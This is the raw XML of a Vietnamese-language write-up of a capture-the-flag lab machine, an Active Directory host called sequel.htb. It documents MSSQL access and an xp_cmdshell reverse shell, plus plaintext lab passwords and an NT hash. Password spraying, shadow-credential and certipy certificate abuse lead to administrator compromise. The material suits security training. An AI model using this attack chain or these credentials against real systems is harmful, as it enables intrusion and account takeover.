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B1 Scanning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1526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8899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615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442.1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có thể thấy đây là 1 AD khi mở cổng 88 cho keberos và cả cổng 1433 cho sql-server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color w:val="ffffff" w:themeColor="background1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta được cho thông tin như sau: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">rose / KxEPkKe6R8su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  <w:t xml:space="preserve">Sử dụng smbclient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto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814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892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848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24.2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1 thư mục accounting hay ho để ta tới thử xem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662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402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92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51.7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lấy 2 file đó về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1446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9096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51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97.9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unzip file accounts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044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846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500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75.6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xem thông tin của 1 file xml trong đó có nói về password và email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94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913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549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00.7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Nhờ chatgpt đổi qua dạng bảng cho dễ đọc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1017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6620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510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18.9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thấy ở cuối cùng có thông tin đây là mssql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C1 dùng msqclient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8111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140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581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03.2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Sử dụng thông tin đăng nhập đó ta có thể dùng mssqlclient trong impacket để tấn công vào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C2: Có thể sử dụng metasploit để tấn công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263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2260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172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71.0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666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036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366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07.6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2756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12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327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83.2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698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310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769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96.8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bật chế độ xp_cmdshell lên để có thể tương tác với shell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tạo 1 payload reverse_shell </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tooltip="https://www.revshells.com/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">tại đây</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> và dùng xp_cmdshell để thực thi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623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117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946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74.5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kết nối trả về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17240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684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43574" cy="172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2.25pt;height:135.7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846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282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258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56.57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1 folder sql 2019 ta truy cập sâu hơn vào file configuration.INI thì sẽ thấy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8818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062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698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550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thông tin sqlsvaccount và mk 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PS C:\SQL2019\ExpressAdv_ENU&gt; type sql-Configuration.INI</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[OPTIONS]</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ACTION="Install"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">QUIET="True"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">FEATURES=SQL</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">INSTANCENAME="SQLEXPRESS"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">INSTANCEID="SQLEXPRESS"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">AGTSVCSTARTUPTYPE="Manual"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMFABRICPORT="0"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMFABRICNETWORKLEVEL=""0"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMFABRICENCRYPTION="0"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MATRIXCMBRICKCOMMPORT="0"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLSVCSTARTUPTYPE="Automatic"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">FILESTREAMLEVEL="0"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ENABLERANU="False" </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLSVCACCOUNT="SEQUEL\sql_svc"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLSVCPASSWORD="WqSZAF6CysDQbGb3"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLSYSADMINACCOUNTS="SEQUEL\Administrator"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITYMODE="SQL"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SAPWD="MSSQLP@ssw0rd!"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ADDCURRENTUSERASSQLADMIN="False"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">TCPENABLED="1"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">NPENABLED="1"</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">BROWSERSVCSTARTUPTYPE="Automatic"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IAcceptSQLServerLicenseTerms=True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Từ thông tin mật khẩu đó ta dùng password spraying để tìm tk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830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733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478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73.8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dùng công cụ nxc để thực hiện tấn công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-&gt; tìm ra tk ryan mk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">WqSZAF6CysDQbGb3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dùng công cụ evil-winrm để kết nối tới máy mục tiêu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033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54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920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51.2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Lấy được flag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8709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508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287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58.83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B4: leo thang đặc quyền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989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899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429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3.8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Sử dụng impacket-owner edit để đổi quyền sở hữu của tk ca_svc cho ryan.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8338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512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883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69.5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công cụ dacledit để cấp full quyền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8000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274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680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53.5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dùng shadow credential Attack, ta add 1 malicious key cho ca_svc giúp tk ryan có thể được xác thực dưới quyên fcuar ca_svc mà chỉ cần certificate mà k cần password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Lấy NT hash cảu ca_svc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6665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063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266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178.4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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Dùng câu lệnh này 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certipy-ad find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-u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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="90a959"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">'ca_svc@sequel.htb'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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-hashes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 :3b181b914e7a9d5508ea1e20bc2b7fce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-stdout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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-vulnerable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eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75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387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7415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5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35.74pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                <v:imagedata r:id="rId33" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="2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9522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807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6395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503.56pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                <v:imagedata r:id="rId3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hash của tk sa_svc rồi ta dùng câu lệnh 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certipy-ad auth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="f4bf75"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-pfx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 administrator.pfx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Để lấy được hash của admin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7315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104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973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76.6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hash và đăng nhập vào lấy flag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5871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095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2058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162.1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81392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4194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4581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360.74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8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hyperlink" Target="https://www.revshells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2025-04-11T22:09:15Z</dcterms:modified>
</cp:coreProperties>
</file>